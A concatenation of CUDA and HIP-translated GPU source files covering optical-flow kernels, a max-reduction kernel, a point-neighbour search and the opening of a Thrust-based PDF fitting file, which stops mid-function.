outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } __global__ void putOverOriginalFlowKernel(const int2 inputOffset, const int2 inputSize, const float2* const inputFlow, const int2 outputOffset, const int2 outputSize, float2* outputFlow) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= inputSize.x || y >= inputSize.y) return; float2 input = inputFlow[y * inputSize.x + x]; if (input.x != INVALID_FLOW_VALUE) { int2 outputCoord = make_int2(x, y) + inputOffset - outputOffset; if (inRange(outputCoord, outputSize)) { outputFlow[outputCoord.y * outputSize.x + outputCoord.x] = input; } } } Status OpticalFlow::putOverOriginalFlow(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputFlow, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputFlow, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); putOverOriginalFlowKernel<<<dimGrid, dimBlock, 0, stream>>>(inputOffset, inputSize, inputFlow.get(), outputOffset, outputSize, outputFlow.get()); return CUDA_STATUS; } __global__ void identityFlowKernel(const bool normalizedFlow, const int2 size, float2* coordBuffer) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size.x || y >= size.y) return; if (normalizedFlow) { coordBuffer[y * size.x + x] = make_float2(float(x) / size.x, float(y) / size.y); } else { coordBuffer[y * size.x + x] = make_float2(x, y); } } Status OpticalFlow::generateIdentityFlow(const int2 size, GPU::Buffer<float2> coordBuffer, GPU::Stream gpuStream, const bool normalizedFlow) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size.y, TILE_WIDTH), 1); identityFlowKernel<<<dimGrid, dimBlock, 0, stream>>>(normalizedFlow, size, coordBuffer.get()); return CUDA_STATUS; } __global__ void transformOffsetToFlowKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 offset = inputBuffer[y * size0.x + x]; if (offset.x != INVALID_FLOW_VALUE) { outputBuffer[y * size0.x + x] = offset + make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); } else { outputBuffer[y * size0.x + x] = offset; } } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, GPU::Buffer<float2> buffer, GPU::Stream gpuStream) { return transformOffsetToFlow(size0, offset0, offset1, buffer, buffer, gpuStream); } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); transformOffsetToFlowKernel<<<dimGrid, dimBlock, 0, stream>>>(size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void transformFlowToOffsetKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 flow = inputBuffer[y * size0.x + x]; if (flow.x != INVALID_FLOW_VALUE) outputBuffer[y * size0.x + x] = flow - make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); else outputBuffer[y * size0.x + x] = flow; } Status OpticalFlow::transformFlowToOffset(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); transformFlowToOffsetKernel<<<dimGrid, dimBlock, 0, stream>>>(size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void coordLookupKernel(int outputWidth, int outputHeight, const float2* g_iCoord, int inputWidth, int inputHeight, const uint32_t* g_idata, uint32_t* g_odata) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < outputWidth && y < outputHeight) { float2 uv = g_iCoord[y * outputWidth + x]; int2 size = make_int2(inputWidth, inputHeight); g_odata[y * outputWidth + x] = Image::bilinearLookup<Image::BilinearLookupRGBAtoRGBA>(uv, size, g_idata); } } Status OpticalFlow::coordLookup(const int outputWidth, const int outputHeight, const GPU::Buffer<const float2> coordBuffer, const int inputWidth, const int inputHeight, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(outputWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(outputHeight, dimBlock.y), 1); coordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(outputWidth, outputHeight, coordBuffer.get(), inputWidth, inputHeight, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] *= toMul; } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); mulFlowOperatorKernel<<<dimGrid, dimBlock, 0, stream.get()>>>(dst.get(), toMul, size); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2* src, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] = make_float2(src[i].x * toMul.x, src[i].y * toMul.y); } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const GPU::Buffer<const float2> src, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); mulFlowOperatorKernel<<<dimGrid, dimBlock, 0, stream.get()>>>(dst.get(), src.get(), toMul, size); return CUDA_STATUS; } __global__ void generateWeightKernel(const int kernelSize, const float sigmaDistance, float* kernelWeight) { int y = blockIdx.y * blockDim.x + threadIdx.y; int x = blockIdx.x * blockDim.y + threadIdx.x; if (x <= 2 * kernelSize && y <= 2 * kernelSize) { float maxDist = kernelSize * 1.4142; float distSpace = length(make_float2(x - kernelSize, y - kernelSize)) / maxDist; float weightDist = exp(-sigmaDistance * distSpace * distSpace); kernelWeight[y * (2 * kernelSize + 1) + x] = weightDist; } } __global__ void interCoordLookupKernel(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const uint32_t* inputBuffer, const int coordWidth, const int coordHeight, const float2* coordBuffer, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < coordWidth && y < coordHeight) { float2 coord = coordBuffer[y * coordWidth + x] - make_float2(interOffsetX, interOffsetY); if (coord.x >= 0 && coord.x < interWidth && coord.y >= 0 && coord.y < interHeight) { outputBuffer[y * coordWidth + x] = inputBuffer[int(coord.y) * interWidth + int(coord.x)]; } else { outputBuffer[y * coordWidth + x] = 0; } } } Status OpticalFlow::interCoordLookup(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const GPU::Buffer<const uint32_t> inputBuffer, const int coordWidth, const int coordHeight, const GPU::Buffer<const float2> coordBuffer, GPU::Buffer<uint32_t> output, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(coordWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(coordHeight, dimBlock.y), 1); interCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(warpWidth, interOffsetX, interOffsetY, interWidth, interHeight, inputBuffer.get(), coordWidth, coordHeight, coordBuffer.get(), output.get()); return CUDA_STATUS; } __global__ void flowToRGBAKernel(const int2 size, const float2* inputBuffer, const int2 maxFlowValue, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { float2 input = inputBuffer[y * size.x + x]; if (abs(input.x - INVALID_FLOW_VALUE) < 1e-5) { outputBuffer[y * size.x + x] = 0; } else { outputBuffer[y * size.x + x] = Image::RGBA::pack((float(input.x) / maxFlowValue.x) * 255, (float(input.y) / maxFlowValue.y) * 255, 0, 255); } } } Status OpticalFlow::convertFlowToRGBA(const int2 size, const GPU::Buffer<const float2> src, const int2 maxFlowValue, GPU::Buffer<uint32_t> dst, GPU::Stream stream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); flowToRGBAKernel<<<dimGrid, dimBlock, 0, stream.get()>>>(size, src.get(), maxFlowValue, dst.get()); return CUDA_STATUS; } __global__ void setAlphaToFlowBufferKernel(const int2 size, const uint32_t* colorBuffer, float2* flowBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { const unsigned index = y * size.x + x; if (Image::RGBA::a(colorBuffer[index]) == 0) { flowBuffer[index] = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } } } Status OpticalFlow::setAlphaToFlowBuffer(const int2 size, const GPU::Buffer<const uint32_t> colorBuffer, GPU::Buffer<float2> flowBuffer, GPU::Stream gpuStream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); cudaStream_t stream = gpuStream.get(); setAlphaToFlowBufferKernel<<<dimGrid, dimBlock, 0, stream>>>(size, colorBuffer.get(), flowBuffer.get()); return CUDA_STATUS; } } // namespace Util } // namespace VideoStitch
acd4ff7a6fe95c16d82531be51133658070ea313.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> #include <cutil_inline.h> // includes cuda.h and hip/hip_runtime_api.h #include <cutil_math.h> #include "reductionMax.hh" #include "sharedMem.cuh" // Instantiate kernels to prevent linker errors template int reduce_max<int >(int *d_odata, int *d_idata, int size); template float reduce_max<float >(float *d_odata, float *d_idata, int size); template double reduce_max<double>(double *d_odata, double *d_idata, int size); template <class T, unsigned int blockSize> __global__ void reduce_max_kernel(T *g_odata, T *g_idata, unsigned int n) { SharedMemory<T> smem; T *sdata = smem.getPointer(); // perform first level of reduction, // reading from global memory, writing to shared memory unsigned int tid = threadIdx.x; unsigned int i = blockIdx.x*blockSize + threadIdx.x; unsigned int gridSize = blockSize*2*gridDim.x; // we reduce multiple elements per thread. The number is determined by the // number of active thread blocks (via gridSize). More blocks will result // in a larger gridSize and therefore fewer elements per thread T thMax = fmaxf(g_idata[i], g_idata[i + blockSize]); i += gridSize; while (i < n) { T a = fmaxf(g_idata[i], g_idata[i + blockSize]); thMax = fmaxf(thMax, a); i += gridSize; } sdata[tid] = thMax; __syncthreads(); // do reduction in shared mem if (blockSize >= 512) { if (tid < 256) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 256]); } __syncthreads(); } if (blockSize >= 256) { if (tid < 128) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 128]); } __syncthreads(); } if (blockSize >= 128) { if (tid < 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 64]); } __syncthreads(); } if (tid < 32) { if (blockSize >= 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 32]); } if (blockSize >= 32) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 16]); } if (blockSize >= 16) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 8]); } if (blockSize >= 8) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 4]); } if (blockSize >= 4) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 2]); } if (blockSize >= 2) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 1]); } } // write result for this block to global mem if (tid == 0) g_odata[blockIdx.x] = sdata[0]; } template <class T> T reduce_max(T *d_odata, T *d_idata, int size) { const int maxThreads = 128; const int maxBlocks = 128; // TODO: Test/Increase for future devices w/ more processors int threads = 1; if( size != 1 ) { threads = (size < maxThreads*2) ? size / 2 : maxThreads; } int blocks = size / (threads * 2); blocks = min(maxBlocks, blocks); dim3 dimBlock(threads, 1, 1); dim3 dimGrid(blocks, 1, 1); int smemSize = threads * sizeof(T); switch (threads) { case 512: hipLaunchKernelGGL(( reduce_max_kernel<T, 512>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 256: hipLaunchKernelGGL(( reduce_max_kernel<T, 256>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 128: hipLaunchKernelGGL(( reduce_max_kernel<T, 128>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 64: hipLaunchKernelGGL(( reduce_max_kernel<T, 64>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 32: hipLaunchKernelGGL(( reduce_max_kernel<T, 32>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 16: hipLaunchKernelGGL(( reduce_max_kernel<T, 16>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 8: hipLaunchKernelGGL(( reduce_max_kernel<T, 8>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 4: hipLaunchKernelGGL(( reduce_max_kernel<T, 4>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 2: hipLaunchKernelGGL(( reduce_max_kernel<T, 2>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 1: hipLaunchKernelGGL(( reduce_max_kernel<T, 1>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; default: exit(1); } T* h_odata = new T[blocks]; cutilSafeCall( hipMemcpy( h_odata, d_odata, blocks*sizeof(T), hipMemcpyDeviceToHost) ); T result = h_odata[0]; for( int i = 1; i < blocks; i++ ) { result = max(result, h_odata[i]); } delete[] h_odata; return result; }
acd4ff7a6fe95c16d82531be51133658070ea313.cu
#include <iostream> #include <cutil_inline.h> // includes cuda.h and cuda_runtime_api.h #include <cutil_math.h> #include "reductionMax.hh" #include "sharedMem.cuh" // Instantiate kernels to prevent linker errors template int reduce_max<int >(int *d_odata, int *d_idata, int size); template float reduce_max<float >(float *d_odata, float *d_idata, int size); template double reduce_max<double>(double *d_odata, double *d_idata, int size); template <class T, unsigned int blockSize> __global__ void reduce_max_kernel(T *g_odata, T *g_idata, unsigned int n) { SharedMemory<T> smem; T *sdata = smem.getPointer(); // perform first level of reduction, // reading from global memory, writing to shared memory unsigned int tid = threadIdx.x; unsigned int i = blockIdx.x*blockSize + threadIdx.x; unsigned int gridSize = blockSize*2*gridDim.x; // we reduce multiple elements per thread. The number is determined by the // number of active thread blocks (via gridSize). More blocks will result // in a larger gridSize and therefore fewer elements per thread T thMax = fmaxf(g_idata[i], g_idata[i + blockSize]); i += gridSize; while (i < n) { T a = fmaxf(g_idata[i], g_idata[i + blockSize]); thMax = fmaxf(thMax, a); i += gridSize; } sdata[tid] = thMax; __syncthreads(); // do reduction in shared mem if (blockSize >= 512) { if (tid < 256) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 256]); } __syncthreads(); } if (blockSize >= 256) { if (tid < 128) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 128]); } __syncthreads(); } if (blockSize >= 128) { if (tid < 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 64]); } __syncthreads(); } if (tid < 32) { if (blockSize >= 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 32]); } if (blockSize >= 32) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 16]); } if (blockSize >= 16) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 8]); } if (blockSize >= 8) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 4]); } if (blockSize >= 4) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 2]); } if (blockSize >= 2) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 1]); } } // write result for this block to global mem if (tid == 0) g_odata[blockIdx.x] = sdata[0]; } template <class T> T reduce_max(T *d_odata, T *d_idata, int size) { const int maxThreads = 128; const int maxBlocks = 128; // TODO: Test/Increase for future devices w/ more processors int threads = 1; if( size != 1 ) { threads = (size < maxThreads*2) ? size / 2 : maxThreads; } int blocks = size / (threads * 2); blocks = min(maxBlocks, blocks); dim3 dimBlock(threads, 1, 1); dim3 dimGrid(blocks, 1, 1); int smemSize = threads * sizeof(T); switch (threads) { case 512: reduce_max_kernel<T, 512><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 256: reduce_max_kernel<T, 256><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 128: reduce_max_kernel<T, 128><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 64: reduce_max_kernel<T, 64><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 32: reduce_max_kernel<T, 32><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 16: reduce_max_kernel<T, 16><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 8: reduce_max_kernel<T, 8><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 4: reduce_max_kernel<T, 4><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 2: reduce_max_kernel<T, 2><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 1: reduce_max_kernel<T, 1><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; default: exit(1); } T* h_odata = new T[blocks]; cutilSafeCall( cudaMemcpy( h_odata, d_odata, blocks*sizeof(T), cudaMemcpyDeviceToHost) ); T result = h_odata[0]; for( int i = 1; i < blocks; i++ ) { result = max(result, h_odata[i]); } delete[] h_odata; return result; }
3cab49b19ca7c85656bc45669928d77a12380b5c.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /** * @file cudaNeighbours.cpp * @author Luca Bartoli([email protected]) * @brief Cuda class impelentation for get neighbours points for each point * @version 1.0 * @date 2019-08-28 * * @copyright Copyright (c) 2019 * */ #include <src/cudaNeighbours/cudaNeighbours.h> __global__ void kernel(float *d_points, int* d_neighbours, int n, int neighbours, float eps, int MAXNEIGHB){ int id = threadIdx.x + blockIdx.x * blockDim.x; while(id < n){ int i = 0; int s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+n-1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if( i > MAXNEIGHB/2-1){ break; } } s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if(i > MAXNEIGHB-2){ break; } } d_neighbours[MAXNEIGHB * id + i] = -1; id += blockDim.x * gridDim.x; } } bool cudaNeighbours::init(int neighbours, float eps, int MAXNEIGHB,int cudaDevice){ //Get device propriety /////////////////////////////////////////////////////////// int deviceCount; hipGetDeviceCount(&deviceCount); if(deviceCount <= cudaDevice){ std::cerr<<"cudaFiltering: Wrong GPU device ID\n"; exit(-1); } hipSetDevice(cudaDevice); hipDeviceProp_t deviceProp; hipGetDeviceProperties(&deviceProp,cudaDevice); this->sm = deviceProp.multiProcessorCount; std::cout<<"Using: "<<deviceProp.name<<"\n\n"; ////////////////////////////////////////////////////////// this->eps = eps; this->neighbours = neighbours; this->MAXNEIGHB = MAXNEIGHB; #ifndef COMPILE_FOR_NVIDIA_TX2 //malloc on host (pinned memory) HANDLE_ERROR( hipHostMalloc((void**)&h_neighbours, MAXNEIGHB * MAXPOINTS * sizeof(int)) ); #else #pragma message "Select compilation for TX2" h_neighbours = new int[MAXNEIGHB * MAXPOINTS]; #endif HANDLE_ERROR( hipMalloc((void**)&d_points,MAXPOINTS * sizeof(float) * 4) ); HANDLE_ERROR( hipMalloc((void**)&d_neighbours,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); return true; } void cudaNeighbours::calculateNeighbours(float *mat, int n){ HANDLE_ERROR( hipMemset(d_neighbours,0,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); HANDLE_ERROR( hipMemcpy(d_points, mat, n * sizeof(float) * 4, hipMemcpyHostToDevice) ); hipLaunchKernelGGL(( kernel), dim3(this->sm),dim3(1024), 0, 0, d_points, d_neighbours, n, this->neighbours, this->eps, MAXNEIGHB); HANDLE_ERROR( hipDeviceSynchronize() ); HANDLE_ERROR( hipMemcpy(h_neighbours, d_neighbours , MAXNEIGHB * n * sizeof(int), hipMemcpyDeviceToHost) ); } void cudaNeighbours::close(){ hipFree(d_points); #ifndef COMPILE_FOR_NVIDIA_TX2 hipFree(d_neighbours); #else delete [] h_neighbours; #endif hipFree(h_neighbours); }
3cab49b19ca7c85656bc45669928d77a12380b5c.cu
/** * @file cudaNeighbours.cpp * @author Luca Bartoli([email protected]) * @brief Cuda class impelentation for get neighbours points for each point * @version 1.0 * @date 2019-08-28 * * @copyright Copyright (c) 2019 * */ #include <src/cudaNeighbours/cudaNeighbours.h> __global__ void kernel(float *d_points, int* d_neighbours, int n, int neighbours, float eps, int MAXNEIGHB){ int id = threadIdx.x + blockIdx.x * blockDim.x; while(id < n){ int i = 0; int s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+n-1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if( i > MAXNEIGHB/2-1){ break; } } s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if(i > MAXNEIGHB-2){ break; } } d_neighbours[MAXNEIGHB * id + i] = -1; id += blockDim.x * gridDim.x; } } bool cudaNeighbours::init(int neighbours, float eps, int MAXNEIGHB,int cudaDevice){ //Get device propriety /////////////////////////////////////////////////////////// int deviceCount; cudaGetDeviceCount(&deviceCount); if(deviceCount <= cudaDevice){ std::cerr<<"cudaFiltering: Wrong GPU device ID\n"; exit(-1); } cudaSetDevice(cudaDevice); cudaDeviceProp deviceProp; cudaGetDeviceProperties(&deviceProp,cudaDevice); this->sm = deviceProp.multiProcessorCount; std::cout<<"Using: "<<deviceProp.name<<"\n\n"; ////////////////////////////////////////////////////////// this->eps = eps; this->neighbours = neighbours; this->MAXNEIGHB = MAXNEIGHB; #ifndef COMPILE_FOR_NVIDIA_TX2 //malloc on host (pinned memory) HANDLE_ERROR( cudaMallocHost((void**)&h_neighbours, MAXNEIGHB * MAXPOINTS * sizeof(int)) ); #else #pragma message "Select compilation for TX2" h_neighbours = new int[MAXNEIGHB * MAXPOINTS]; #endif HANDLE_ERROR( cudaMalloc((void**)&d_points,MAXPOINTS * sizeof(float) * 4) ); HANDLE_ERROR( cudaMalloc((void**)&d_neighbours,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); return true; } void cudaNeighbours::calculateNeighbours(float *mat, int n){ HANDLE_ERROR( cudaMemset(d_neighbours,0,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); HANDLE_ERROR( cudaMemcpy(d_points, mat, n * sizeof(float) * 4, cudaMemcpyHostToDevice) ); kernel<<<this->sm,1024>>>(d_points, d_neighbours, n, this->neighbours, this->eps, MAXNEIGHB); HANDLE_ERROR( cudaDeviceSynchronize() ); HANDLE_ERROR( cudaMemcpy(h_neighbours, d_neighbours , MAXNEIGHB * n * sizeof(int), cudaMemcpyDeviceToHost) ); } void cudaNeighbours::close(){ cudaFree(d_points); #ifndef COMPILE_FOR_NVIDIA_TX2 cudaFree(d_neighbours); #else delete [] h_neighbours; #endif cudaFree(h_neighbours); }
e82d1d33266c5e3b8b740e413f75b35ab8018ee4.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "../GlobalCudaDefines.hh" #include "ThrustPdfFunctor.hh" #include "thrust/sequence.h" #include "thrust/iterator/constant_iterator.h" //#ifdef CUDAPRINT #include "cuPrintf.hip" #include <fstream> //#endif // These variables are either function-pointer related (thus specific to this implementation) // or constrained to be in the CUDAglob translation unit by nvcc limitations; otherwise they // would be in FunctorBase. // Device-side, translation-unit constrained. __constant__ fptype hipArray[maxParams]; // Holds device-side fit parameters. __constant__ unsigned int paramIndices[maxParams]; // Holds functor-specific indices into hipArray. Also overloaded to hold integer constants (ie parameters that cannot vary.) __constant__ fptype functorConstants[maxParams]; // Holds non-integer constants. Notice that first entry is number of events. __constant__ fptype normalisationFactors[maxParams]; // For debugging __constant__ int callnumber; __constant__ int gpuDebug; __constant__ unsigned int debugParamIndex; __device__ int internalDebug1 = -1; __device__ int internalDebug2 = -1; __device__ int internalDebug3 = -1; int cpuDebug = 0; // Function-pointer related. __device__ void* device_function_table[200]; // Not clear why this cannot be __constant__, but it causes crashes to declare it so. void* host_function_table[200]; unsigned int num_device_functions = 0; #ifdef OMP_ON // Make functionAddressToDevideIndexMap and array of maps indexed by thread id since // I get the following compiler error if I try to make it threadprivate. // "functionAddressToDeviceIndexMap declared threadprivate after first use" typedef std::map<void*, int> tMapType; tMapType functionAddressToDeviceIndexMap[MAX_THREADS]; #pragma omp threadprivate(host_function_table, num_device_functions) fptype gSum; fptype sums[MAX_THREADS]; double gLognorm; double lognorms[MAX_THREADS]; #else std::map<void*, int> functionAddressToDeviceIndexMap; #endif #define cutilSafeCall(err) __cudaSafeCall(err, __FILE__, __LINE__) // For use in debugging memory issues void printMemoryStatus (std::string file, int line) { size_t memfree = 0; size_t memtotal = 0; hipDeviceSynchronize(); hipMemGetInfo(&memfree, &memtotal); hipDeviceSynchronize(); std::cout << "Memory status " << file << " " << line << " Free " << memfree << " Total " << memtotal << " Used " << (memtotal - memfree) << std::endl; } #include <execinfo.h> void* stackarray[10]; void abortWithCudaPrintFlush (std::string file, int line, std::string reason, const FunctorBase* pdf = 0) { #ifdef CUDAPRINT cudaPrintfDisplay(stdout, true); cudaPrintfEnd(); #endif std::cout << "Abort called from " << file << " line " << line << " due to " << reason << std::endl; if (pdf) { std::set<Variable*> pars; pdf->getParameters(pars); std::cout << "Parameters of " << pdf->getName() << " : \n"; for (std::set<Variable*>::iterator v = pars.begin(); v != pars.end(); ++v) { if (0 > (*v)->index) continue; std::cout << " " << (*v)->name << " (" << (*v)->index << ") :\t" << host_params[(*v)->index] << std::endl; } } std::cout << "Parameters (" << totalParams << ") :\n"; for (int i = 0; i < totalParams; ++i) { std::cout << host_params[i] << " "; } std::cout << std::endl; // get void* pointers for all entries on the stack size_t size = backtrace(stackarray, 10); // print out all the frames to stderr backtrace_symbols_fd(stackarray, size, 2); exit(1); } void __cudaSafeCall (hipError_t err, const char* file, int line) { if (hipSuccess != err) { std::cout << "Error code " << err << " (" << hipGetErrorString(err) << ") at " << file << ", " << line << std::endl; exit(1); } } __device__ fptype calculateEval (fptype rawPdf, fptype* evtVal, unsigned int par) { // Just return the raw PDF value, for use in (eg) normalisation. return rawPdf; } __device__ fptype calculateNLL (fptype rawPdf, fptype* evtVal, unsigned int par) { //if ((10 > callnumber) && (threadIdx.x < 10) && (blockIdx.x == 0)) cuPrintf("calculateNll %i %f %f %f\n", callnumber, rawPdf, normalisationFactors[par], rawPdf*normalisationFactors[par]); 